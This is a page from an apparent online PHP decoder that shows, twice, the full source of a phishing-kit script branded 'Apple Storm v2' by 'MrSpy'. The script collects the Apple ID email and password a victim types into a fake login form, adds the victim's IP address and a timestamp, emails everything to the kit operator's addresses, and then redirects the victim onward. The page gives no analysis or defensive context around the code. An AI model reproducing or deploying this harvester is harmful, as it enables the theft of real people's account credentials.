Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php session_start(); include "../block.php"; $ip = getenv("REMOTE_ADDR"); $spyllo..

Decoded Output download

<?php 
session_start();  
include "../block.php"; 
$ip = getenv("REMOTE_ADDR"); 
 
$spyllogin = "<pre><font color='#060606' style='font-size:14px;font-weight: bold;'> 
+----------------------------------------------------------+<br> 
          Apple Storm v2 by JOke           <br> 
+----------------------------------------------------------+<br> 
SPY.EMAIL         : ".$_POST['spyuser']."<br> 
SPY.ASS           : ".$_POST['spypass']."<br> 
+----------------------------------------------------------+<br> 
SPY.IP            : ".getenv('REMOTE_ADDR')."<br> 
SPY.Date.&.Time   : ".@date("d/m/Y g:i a")."<br> 
From              : <a href='http://www.geoiptool.com/?IP=".getenv('REMOTE_ADDR').">SpyGeo</a> 
 
+----------------------------------------------------------+<br> 

"; 
 
$Spytitle = "Apple v2 | Desktop Login | ".getenv('REMOTE_ADDR'); 
$spyheader = "From: Storm 2017 Apple <[email protected]>
MIME-Version: 1.0
Content-Type: text/html
Content-Transfer-Encoding: 8bit

"; 
mail("[email protected],[email protected]",$spytitle,$spyllogin,$spyheader); 
$spyox ="ydkome6g46re54g6er4g68erg8er6"; 
$s = base64_encode($spyox); 
 
$x=md5(microtime()); 
 
$src="../process.php?dispatch=$x$x&_Owner=$s"; 
header("location:$src"); 
 ?> 
<html> 
<!-- 
  __  __ _     _               _____              
 |  \/  (_)   | |             / ____|             
 | \  / |_ ___| |_ ___ _ __  | (___  _ __  _   _  
 | |\/| | / __| __/ _ \ '__|  \___ \| '_ \| | | | 
 | |  | | \__ \ ||  __/ |     ____) | |_) | |_| | 
 |_|  |_|_|___/\__\___|_|    |_____/| .__/ \__, | 
                                    | |     __/ | 
                                    |_|    |___/  V2 
									https://www.facebook.com/007MrSpy 
 --> 
</html> 

Did this file decode correctly?

Original Code

<?php
session_start(); 
include "../block.php";
$ip = getenv("REMOTE_ADDR");

$spyllogin = "<pre><font color='#060606' style='font-size:14px;font-weight: bold;'>
+----------------------------------------------------------+<br>
          Apple Storm v2 by JOke           <br>
+----------------------------------------------------------+<br>
SPY.EMAIL         : ".$_POST['spyuser']."<br>
SPY.ASS           : ".$_POST['spypass']."<br>
+----------------------------------------------------------+<br>
SPY.IP            : ".getenv('REMOTE_ADDR')."<br>
SPY.Date.&.Time   : ".@date("d/m/Y g:i a")."<br>
From              : <a href='http://www.geoiptool.com/?IP=".getenv('REMOTE_ADDR').">SpyGeo</a>

+----------------------------------------------------------+<br>
\n";

$Spytitle = "Apple v2 | Desktop Login | ".getenv('REMOTE_ADDR');
$spyheader = "From: Storm 2017 Apple <[email protected]>\r\nMIME-Version: 1.0\r\nContent-Type: text/html\r\nContent-Transfer-Encoding: 8bit\r\n\r\n";
mail("[email protected],[email protected]",$spytitle,$spyllogin,$spyheader);
$spyox ="ydkome6g46re54g6er4g68erg8er6";
$s = base64_encode($spyox);

$x=md5(microtime());

$src="../process.php?dispatch=$x$x&_Owner=$s";
header("location:$src");
 ?>
<html>
<!--
  __  __ _     _               _____             
 |  \/  (_)   | |             / ____|            
 | \  / |_ ___| |_ ___ _ __  | (___  _ __  _   _ 
 | |\/| | / __| __/ _ \ '__|  \___ \| '_ \| | | |
 | |  | | \__ \ ||  __/ |     ____) | |_) | |_| |
 |_|  |_|_|___/\__\___|_|    |_____/| .__/ \__, |
                                    | |     __/ |
                                    |_|    |___/  V2
									https://www.facebook.com/007MrSpy
 -->
</html>

Function Calls

session_start 1

Variables

None

Stats

MD5 3a7e43b13e1845c8b7ae488f187873d9
Eval Count 0
Decode Time 105 ms